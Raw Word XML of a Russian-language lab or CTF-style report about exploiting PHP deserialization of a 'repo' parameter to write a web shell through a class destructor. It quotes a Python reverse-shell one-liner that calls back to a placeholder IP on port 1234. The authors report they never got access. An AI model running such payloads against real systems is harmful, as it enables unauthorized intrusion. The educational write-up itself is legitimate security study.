    <w:p w14:paraId="7F5E3E84" w14:textId="7AA72227" w:rsidR="00C949F8" w:rsidRDefault="00C949F8" w:rsidP="000F0663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C726F" wp14:editId="4CFB5C12">
            <wp:extent cx="5165886" cy="5489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34" cy="54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24E1" w14:textId="06FE6F83" w:rsidR="00C949F8" w:rsidRDefault="00DB2640" w:rsidP="00A949B5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DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>аз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берем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ся с кодом. Этот файл ждет, что будет ука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зан параметр </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2640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repo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, а передан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ные дан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ные под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верга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 xml:space="preserve">ются </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>десери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али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зации</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (стро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ки 23–24). Так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же име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ется класс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2640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atabaseExport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, содер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жащий имя фай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ла и дан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ные (стро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ки 3–6), которые будут записа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ны в этот файл при вызове дес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трук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тора клас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са (стро</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>ки 15–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2640">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>20).</w:t>
      </w:r>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>По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луча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 xml:space="preserve">ется, что мы можем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>сери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али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зовать</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> объ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ект такого клас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са и отпра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 xml:space="preserve">вить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>сери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али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зован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ные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> дан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ные на сер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вер. А это откры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вает воз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можность записать какие угод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но дан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ные в любой файл. Писать мы, конеч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 xml:space="preserve">но, будем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>бэк</w:t>
      </w:r>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>шелл</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сначала нужно сгенерировать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>сериализованн</w:t>
      </w:r>
      <w:r w:rsidR="004800F7">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ыый</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004800F7">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> скрипт</w:t>
      </w:r>
      <w:r w:rsidR="00A949B5" w:rsidRPr="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A949B5">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Преобразуем код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D015B5" w14:textId="106A9ACF" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB26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EBE773" wp14:editId="41537D44">
            <wp:extent cx="4770120" cy="214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A07C" w14:textId="134B8A6D" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB2640">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355429AF" w14:textId="0877D6A1" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB2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аем код внутрь файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A949B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открываем его </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78719FF9" w14:textId="77777777" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB2640">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540A41A0" w14:textId="3A130A38" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB264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01114" wp14:editId="21540E3D">
            <wp:extent cx="5708858" cy="1057701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38" cy="10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DC71" w14:textId="4D9F2D9E" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00DB2640">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09578CDB" w14:textId="188E6CA5" w:rsidR="00A949B5" w:rsidRPr="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы копируем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вставляем е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в URL-адрес в качестве значения параметра </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>arepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3653B" w14:textId="4F4E0FBE" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Получ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аем</w:t>
      </w:r>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> следующий вывод</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEC830" w14:textId="32129CF3" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F1BE302" w14:textId="53F0C1AE" w:rsidR="00A949B5" w:rsidRPr="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B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CA8BC" wp14:editId="2D05D608">
            <wp:extent cx="6120130" cy="14058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B311" w14:textId="77777777" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA5F331" w14:textId="14CC820B" w:rsidR="00A949B5" w:rsidRDefault="00A949B5" w:rsidP="00A949B5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Мы замечаем, что сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00A94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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> отображается дважды, что означает, что </w:t>
      </w:r>
      <w:r w:rsidR="004800F7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>скрипт был успешно выполнен</w:t>
      </w:r>
      <w:r w:rsidRPr="00A949B5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC0891C" w14:textId="3FC2E537" w:rsidR="004800F7" w:rsidRPr="00A63663" w:rsidRDefault="004800F7" w:rsidP="004800F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее мы запускали </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на своей машине и вставляли скрипт в переменную </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>3 -</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subprocess</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AF</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INET</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCK</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STREAM</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>(("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A63663">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>",1234));</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dup</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>2(</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t xml:space="preserve">(),0); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dup</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>2(</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t xml:space="preserve">(),1); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dup</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>2(</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>(),2);</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subprocess</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>(["/</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t>","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004800F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004800F7">
        <w:t>"]);'</w:t>
      </w:r>
      <w:r w:rsidRPr="004800F7">
        <w:t xml:space="preserve">», </w:t>
      </w:r>
      <w:r w:rsidRPr="00A63663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>но доступа так и не получили. Не знаем, что делать, все перепробовали.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004800F7" w:rsidRPr="00A63663" w:rsidSect="009376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715D" w14:textId="77777777" w:rsidR="00273991" w:rsidRDefault="00273991" w:rsidP="00EE45B3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00BF36FA" w14:textId="77777777" w:rsidR="00273991" w:rsidRDefault="00273991" w:rsidP="00EE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62E7" w14:textId="77777777" w:rsidR="00854D15" w:rsidRPr="00B37F43" w:rsidRDefault="00854D1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3B4A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>15</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="6F7CF475" w14:textId="77777777" w:rsidR="00854D15" w:rsidRPr="00B37F43" w:rsidRDefault="00854D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7CDA" w14:textId="77777777" w:rsidR="00273991" w:rsidRDefault="00273991" w:rsidP="00EE45B3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75BF1B3F" w14:textId="77777777" w:rsidR="00273991" w:rsidRDefault="00273991" w:rsidP="00EE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838CB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0AC7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0000023"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70A64E2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5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A487CB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6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D4ED4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7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="725A06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9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57E4CC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696AD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="045C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B72467"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CFC667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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03841CC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC42FBD6"/>
    <w:lvl w:ilvl="0" w:tplc="6AB648A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08125606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDC4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F4B6CE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1F829E2"/>
    <w:lvl w:ilvl="0" w:tplc="2DA21E1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10E00BDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D60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763CC"/>
